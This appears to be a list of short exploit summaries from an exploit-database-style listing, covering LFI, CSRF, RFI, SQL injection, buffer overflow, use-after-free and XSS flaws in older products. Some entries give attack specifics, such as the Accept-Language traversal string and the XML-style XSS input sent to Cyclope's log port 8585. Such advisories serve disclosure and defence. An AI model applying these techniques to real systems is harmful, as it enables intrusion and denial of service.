The file 'common.php' is vulnerable to LFI through the 'Accept-Language' HTTP header. This exploit sends '../../common' in the Accept-Language header in order to generate a recursive inclusions and cause a denial of service via resource exhaustion.
InverseFlow v2.4 is vulnerable to CSRF attacks. An attacker can craft a malicious HTML page and send it to the victim. When the victim visits the malicious page, the attacker can add themselves as an admin user without any warning. The password will be sent to the attacker's email address.
The $sortby parameter passed to 'masort' function isn't properly sanitized before being used in a call to create_function() at line 1080, this couses a PHP Code Injection vulnerability.
An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can allow the attacker to bypass authentication, access, modify and delete data within the database.
Sports PHool is vulnerable to a Remote File Include vulnerability. This vulnerability allows an attacker to include a remote file containing arbitrary code, which is then executed on the web server. The exploit code takes two parameters, target and evil, which are used to specify the target URL and the URL of the malicious file to be included. The malicious file contains a PHP script that executes the command specified in the cmd parameter.
The CEPMServer service is vulnerable to a denial of service attack when an abnormally large string is sent to it. This causes the service to crash, preventing it from logging user and computer names. The attack does not stop the filtering, but it does require a complete re-installation of Cyclope to restore the logging feature.
The mentioned class contains the vulnerable SaveViewStateToFile() method, from the typelib which allows to create / overwrite files with arbitrary extensions inside arbitrary locations. It was experimented that the content of theese files can be partially controlled by passing a remote file to the RestoreViewStateFromFile() method.
This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'. By creating a malformed request specifically for the fileName parameter, a stack-based buffer overflow occurs due to a long error message (which contains the fileName), which may result aribitrary remote code execution under the context of 'SYSTEM'.
This exploit uses a combination of cloning objects, removing objects, and appending references to cause a Use After Free vulnerability in Opera 11.51 and previous versions. The exploit also uses a heap spray to increase the chances of a successful attack.
The Cyclope Internet Filtering Proxy is a white & black list website navigation filtering app. It will log all of the client's activities such as visited web sites, the time etc. There is an optional client application if the administrator wishes to acquire the computer name and user information. This XSS vulnerability is due to the fact that nothing is sanitized in the web-based management console. The whitelist and blacklist patterns, for example, are vulnerable. As well as computer name and user fields gathered via the logging port. This PoC takes advantage of the 'user' field (but also works with computer feild). One needs to send in the correct order: <user>USER</user><computer>COMPUTER</computer><ip>IP ADDY</ip> to the default log port 8585. None of these fileds are sanitized. So it's making this XSS a bit more interesing. Atacking machine doesn't need the Cyclope client app installed. Limited in what can be sent, a space will screw up any code you send. The HTML code will usually fix that problem, as well as all the other HTML codes for quotes and so on. So we can remotely inserted our evil XSS, and have it executed when the administrator looks over the logs.
Services By CQR